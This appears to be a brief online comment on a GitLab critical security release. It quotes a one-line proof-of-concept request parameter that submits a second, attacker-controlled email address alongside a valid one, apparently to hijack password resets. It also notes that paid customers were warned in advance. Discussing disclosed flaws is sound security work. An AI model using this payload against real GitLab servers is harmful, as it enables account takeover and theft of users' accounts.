Gitlab Critical Security Release: 16.7.2, 16.6.4, 16.5.6
about.gitlab.com
about.gitlab.com
The POC is quite trivial for it:
user[email][]=valid@email.com&user[email][]=attacker@email.com
It was severe enough that paid customers got a heads up to be ready to patch.